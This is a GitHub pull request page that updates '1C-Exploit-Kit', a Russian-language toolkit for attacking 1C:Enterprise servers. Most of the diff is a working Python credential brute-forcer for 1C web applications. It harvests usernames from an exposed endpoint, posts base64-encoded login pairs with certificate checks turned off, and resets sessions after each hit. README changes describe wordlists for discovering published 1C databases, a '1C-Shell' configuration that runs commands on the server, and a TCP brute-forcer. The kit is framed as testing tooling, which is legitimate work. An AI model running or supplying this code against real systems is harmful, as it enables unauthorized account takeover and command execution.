Skip to content

Some updates #1

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
dinimus wants to merge 9 commits into
base: master
Choose a base branch
from
Open

Some updates #1

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
9 commits
Select commit Hold shift + click to select a range
179d03a
Update README.md
dinimus Nov 9, 2020
af201c6
Update 1c-web-bruter.py
dinimus Nov 9, 2020
2a62570
Update README.md
dinimus Nov 9, 2020
4f011b5
Update README.md
dinimus Nov 9, 2020
627905d
Update 1c-web-bruter.py
dinimus Nov 10, 2020
cf1d1e7
Create README.md
dinimus Nov 10, 2020
b7e4463
Update README.md
dinimus Jul 8, 2021
1d0ef53
Update README.md
dinimus Dec 8, 2021
30aa871
Update README.md
dinimus Dec 8, 2021
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
41 changes: 34 additions & 7 deletions 1C-Finder/README.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -6,31 +6,58 @@
Словари для обнаружения баз 1С, которые были опубликованы на веб-сервере.



## Описание словарей:

Базовые имена (common) составлены из имен продуктов в различных вариациях, есть имена с пробелами.

Базовый словарь (base) включает имена основных и распространенных продуктов 1С, словарь взят за основу для составления других словарей, строки с пробелами были убраны.

| # | Описание | Кол-во строк |
| - | --- | --- |
| 1 | Базовые имена (common) | 1571 |
| 2 | base2010..2020 | 8393 |
| 3 | base-2010..2020 | 8393 |
| 4 | base_2010..2020 | 8393 |
| 5 | base1..10 | 7630 |
| 6 | base-1..10 | 7630 |
| 7 | base_1..10 | 7630 |
| 8 | base1..10-2010..2020 | 83930 |
| 9 | base1..10_2010..2020 | 83930 |
| 10 | base1..102010..2020 | 83930 |
| 11 | 1cbase + 1c-base + 1c-base | 2289 |
| 12 | 1c-base-2010..2020 | 8393 |
| 13 | 1c_base_2010..2020 | 8393 |
| 14 | 1c_base1..10 | 7630 |
| 15 | base11..20 | 7630 |
| 16 | base-11..20 | 7630 |
| 17 | base_11..20 | 7630 |
| 18 | base 1..20 + base 2010..2020 | 23653 |
| 19 | base1..10 2010..2020 | 83930 |
| 20 | base1..10 11..20 | 76300 |
| 21 | base2010..2020 + base-2010..2020 + base_2010..2020 | 25179 |
| 22 | base1..10 + base-1..10 + base_1..10 | 22890 |
| 23 | base11..20 + base-11..20 + base_11..20 | 22890 |
| 24 | 1cbase + 1c-base + 1c-base + 1c-base-2010..2020 + 1c_base_2010..2020 + 1c_base1..10 | 26705 |


## Использование

#### Установить Dirb
#### Установить Dirb / dirsearch / другую программу

```
sudo apt update
sudo apt install dirb
```

Или
```
git clone https://github.com/maurosoria/dirsearch.git
cd dirsearch
pip3 install -r requirements.txt
```

#### Запустить поиск баз 1С

```
dirsearch.py -e html,php -w ./1_common.txt -u http://192.168.95.10
```




Ваши замечания и пожелания отправляйте сюда - https://t.me/starev_aa
4 changes: 2 additions & 2 deletions 1C-Shell/README.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -6,7 +6,7 @@

## Описание

Конфигурация 1C-Shell для платформы 1С:Предприятие 8, которая позволяет выполнять команды на сервере 1С в контексте пользователя USR1CV8, от имени которого работает сервер 1С.
Конфигурация 1C-Shell для платформы 1С:Предприятие 8, которая позволяет выполнять команды на сервере 1С в контексте пользователя, от имени которого работает сервер 1С.



Expand All @@ -29,4 +29,4 @@



Ваши замечания и пожелания отправляйте сюда - https://t.me/starev_aa
Ваши замечания и пожелания отправляйте сюда - https://t.me/starev_aa
152 changes: 85 additions & 67 deletions 1C-Web-bruter/1c-web-bruter.py
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,119 +1,137 @@
#!/usr/bin/env python
#!/usr/bin/python3

from time import sleep, strftime
from time import sleep,strftime
import sys
import argparse
import signal
import re
import base64
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

try:
import requests
import requests
except:
print("No required module. Install: pip install requests")
exit()

print("No required module. Install: pip install requests")
exit()

# Print the current line on when terminated via ctrl-c
def signal_handler(signal, frame):
sys.stdout.write('\r%-100s\r' % ' ')
print('\n\033[94mStopped at line: ' + str(pwd) + '\033[0m')
print("\r\033[94mBruteforce stopped at " + strftime("%d-%m-%Y %H:%M:%S %Z") + "\033[0m")
sys.exit(0)


sys.stdout.write('\r\033[K\r')
print('\n\033[94mStopped at line: ' + str(pwd) + '\033[0m')
print("\r\033[94mBruteforce stopped at " + strftime("%d-%m-%Y %H:%M:%S %Z") + "\033[0m")
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)

# PARSING ARGS

parser = argparse.ArgumentParser(description='\t\033[1m\033[93m1C Web Application Bruteforcer\033[0m',
epilog='\033[93mExample:\033[0m ./1c-web-bruter.py http://10.2.3.4/buh users.txt pass.txt')
parser.add_argument('Target', metavar='\033[94mtarget\033[0m', type=str,
help='The target URI with directory of 1C webapp. Example: http://192.168.1.1/Tasker')
# parser.add_argument('Version', metavar='\033[91mversion\033[0m', type=str, help='Version of 1C. ex 8.2.19.130')
parser = argparse.ArgumentParser(description='\t\033[1m\033[93m1C Web Application Bruteforcer\033[0m',epilog='\033[93mExample:\033[0m ./1c-web-bruter.py http://10.2.3.4/buh users.txt pass.txt')
parser.add_argument('Target', metavar='\033[94mtarget\033[0m', type=str, help='The target URI with directory of 1C webapp. Example: http://192.168.1.1/Tasker')
parser.add_argument('Username', metavar='\033[94musers\033[0m', type=str, help='The usernames list')
parser.add_argument('Wordlist', metavar='\033[94mpasswords\033[0m', type=str, help='The passwords list')
parser.add_argument("--delay", type=int, help='Time in milliseconds between each request', default=5)
parser.add_argument("--startat", type=int, help='Start at this line in the file', default=0)
# parser.add_argument("--ignore-consecutive-empty", type=int, help='Ignore this many consec. empty lines before exiting', default=4)
parser.add_argument("--ignore-invalid-certificate", type=bool, help='Ignore untrusted certs', default=True)
parser.add_argument('-d', '--delay', type=int, help='Time in milliseconds between each request', dest='delay', default=5)
parser.add_argument('-s', '--startat', type=int, help='Start at this line in the file', dest='startat', default=0)
parser.add_argument('-g', "--gather", help="Gather usernames from '/e1cib/users' and add them into userlist", action='store_true', dest='gather', default=False)
#parser.add_argument("--ignore-consecutive-empty", type=int, help='Ignore this many consec. empty lines before exiting', default=4)

args = parser.parse_args()
# END ARGS

# GLOBAL VARS
delay = args.delay
target = args.Target
# version = args.Version
username = args.Username
wordlist = args.Wordlist
startAt = args.startat
gather = args.gather
success = 0
version = 0
users = []
reseturl = target + '/en_US/e1cib/logout'
resetdata = {'root': '{}'}
# maxEmptyCount = args.ignore_consecutive_empty
ignoreBadCerts = args.ignore_invalid_certificate
#maxEmptyCount = args.ignore_consecutive_empty
# END VARS

print("\033[94mBruteforce started at " + strftime("%d-%m-%Y %H:%M:%S %Z") + "\033[0m\n")
fuser = open(username, 'r')
fpass = open(wordlist, 'r')
usercount = len(re.findall(r"[\n']+?", open(username).read()))

for i in fuser.read().splitlines():
users.append(i)

# Gathering usernames
if gather == True:
gath_users = []
resp = requests.get(target + '/en_US/e1cib/users', verify=False)
if len(resp.text) != None or len(resp.text) != 0:
for i in resp.text.splitlines():
gath_users.append(i)
all_users = users + gath_users
all_users = list(set(all_users))
all_users.sort()
f_new_users = open(username, 'w')
for item in all_users:
f_new_users.write("%s\n" % item)
f_new_users.close()
else:
all_users = users
# End of gathering

usercount = len(all_users)
passcount = len(re.findall(r"[\n']+?", open(wordlist).read()))
print("\033[94mUserlist`s size: \033[93m" + str(usercount) + "\033[0m")
print("\033[94mPasslist`s size: \033[93m" + str(passcount) + "\n\033[0m")

# Version check and directory validation
ver = requests.get(target + '/')
verpage = ver.content
ver = requests.get(target + '/', verify=False)
verpage = ver.content.decode('utf-8')
regex = r'([sysver=]+[0-9\.]+)'
res = re.findall(regex, verpage)
res = re.findall (regex, verpage)
for vl in res:
if 'sysver=' in vl:
version = vl.split('=')[1]
if 'sysver=' in vl:
version = vl.split('=')[1]
if version == 0:
print(
"\033[91m\033[1mCheck the \033[0m\033[93mtarget\033[0m \033[91m\033[1mparameter. 1C Web Application is not found on \033[0m\033[93m" + target + "\033[0m\n")
print("\r\033[94mBruteforce completed at " + strftime("%d-%m-%Y %H:%M:%S %Z") + "\033[0m")
sys.exit(0)
print("\033[91m\033[1mCheck the \033[0m\033[93mtarget\033[0m \033[91m\033[1mparameter. 1C Web Application is not found on \033[0m\033[93m" + target + "\033[0m\n")
print("\r\033[94mBruteforce completed at " + strftime("%d-%m-%Y %H:%M:%S %Z") + "\033[0m")
sys.exit(0)
# End of check and validation

for i in fuser.read().splitlines():
fpass.seek(0)
for j in fpass.read().splitlines():
cred = base64.b64encode(i + ':' + j)
pwd = i + ':' + j
url = target + '/en_US/e1cib/login?version=' + version + '&cred=' + cred + '&vl=en_US&clnId=84c3db7e-661b-9350-57ac-7164384e6c43'
http = requests.post(url)
if http.status_code == 400:
print("\033[91m\033[1mNo free license for new user's session. Try later.\033[0m\n")
print("\r\033[94mFound \033[0m\033[93m\033[1m" + str(success) + "\033[0m \033[94mpassword(s).\033[0m")
print("\033[94mBruteforce completed at " + strftime("%d-%m-%Y %H:%M:%S %Z") + "\033[0m")
sys.exit(0)
if http.status_code == 200:
print("\r\033[1m\033[92m" + pwd.ljust(100) + "\033[0m\r")
success += 1
# Reset session:
setcookie = http.headers['Set-Cookie']
cookie = setcookie.split(';')[0]
resetheader = {'Cookie': cookie}
requests.post(reseturl, headers=resetheader, json=resetdata)
# End reset session
break
sys.stdout.write('\r%-100s\r' % pwd)
sys.stdout.flush()
sleep(delay / 1000.0)
# while not pwd:
# emptyCount += 1
# if emptyCount > maxEmptyCount:
# sys.exit(0)
for i in users:
fpass.seek(0)
for j in fpass.read().splitlines():
cred = base64.b64encode (bytes(i + ':' + j, 'utf-8')).decode('ascii')
pwd = i + ':' + j
url = target + '/en_US/e1cib/login?version=' + version + '&cred=' + cred + '&vl=en_US&clnId=84c3db7e-661b-9350-57ac-7164384e6c43'
http = requests.post(url, verify=False)
if http.status_code == 400:
print("\033[91m\033[1mNo free license for new user's session. Try later.\033[0m\n")
print("\r\033[94mFound \033[0m\033[93m\033[1m" + str(success) + "\033[0m \033[94mpassword(s).\033[0m")
print("\033[94mBruteforce completed at " + strftime("%d-%m-%Y %H:%M:%S %Z") + "\033[0m")
sys.exit(0)
if http.status_code == 200:
print("\r\033[1m\033[92m" + pwd + "\033[0m\033[K")
success +=1
# Reset session:
setcookie = http.headers['Set-Cookie']
cookie = setcookie.split(';')[0]
resetheader = {'Cookie': cookie}
requests.post(reseturl, headers=resetheader, json=resetdata, verify=False)
# End reset session
break
sys.stdout.write('\r%s\033[K\r' %pwd)
sys.stdout.flush()
sleep(delay / 1000.0)
# while not pwd:
# emptyCount += 1
# if emptyCount > maxEmptyCount:
# sys.exit(0)

sys.stdout.write('\r%-100s\r' % ' ')
sys.stdout.write('\r\033[K\r')
if success == 0:
print("\r\033[93mPasswords not found. Try again using another passlist.\033[0m")
print("\r\033[93mPasswords not found. Try again using another passlist.\033[0m")
else:
print("\n\033[94mFound \033[0m\033[93m\033[1m" + str(success) + "\033[0m \033[94mpassword(s).\033[0m")
print("\n\033[94mFound \033[0m\033[93m\033[1m" + str(success) + "\033[0m \033[94mpassword(s).\033[0m")
print("\r\033[94mBruteforce completed at " + strftime("%d-%m-%Y %H:%M:%S %Z") + "\033[0m")
fuser.close()
fpass.close()
fpass.close()
8 changes: 4 additions & 4 deletions 1C-Web-bruter/README.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -28,16 +28,16 @@ pass_ru.txt - Словарь паролей, в нем собраны уника

```
curl http://1.1.1.1/buh/en_US/e1cib/users
curl http://1.1.1.1/buh/ru_RU/e1cib/users
```

Так можно получить только тех пользователей, у которых в профиле указан параметр "Показывать в списке выбора".

Запуск перебора паролей:

```
./1c-web-bruter.py http://1.1.1.1/buh users.txt pass_ru.txt
```
> Пароли из коробки не чувствительны к регистру. "Пароль" и "пАрОль" - одно и тоже, что уменьшает количество паролей для подбора.




Ваши замечания и пожелания отправляйте сюда - https://t.me/starev_aa
Ваши замечания и пожелания отправляйте сюда - https://t.me/starev_aa
10 changes: 10 additions & 0 deletions README.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,10 @@
# 1C-Exploit-Kit
Набор скриптов и словарей для тестирования 1С.

## Описание
| Имя | Описание |
| -- | -- |
| 1C-Finder | Словари для обнаружения баз 1С, опубликованных на веб-сервере |
| 1C-Shell | Конфигурация 1C-Shell для платформы 1С:Предприятие 8, позволяющая выполнять команды на сервере 1С в контексте пользователя, от имени которого работает сервер 1С |
| 1C-TCP-bruter | Скрипт для брутфорса учетных записей клиент-серверных баз 1С |
| 1C-Web-bruter | Скрипт для брутфорса учетных записей баз 1С, опубликованных на веб-сервере |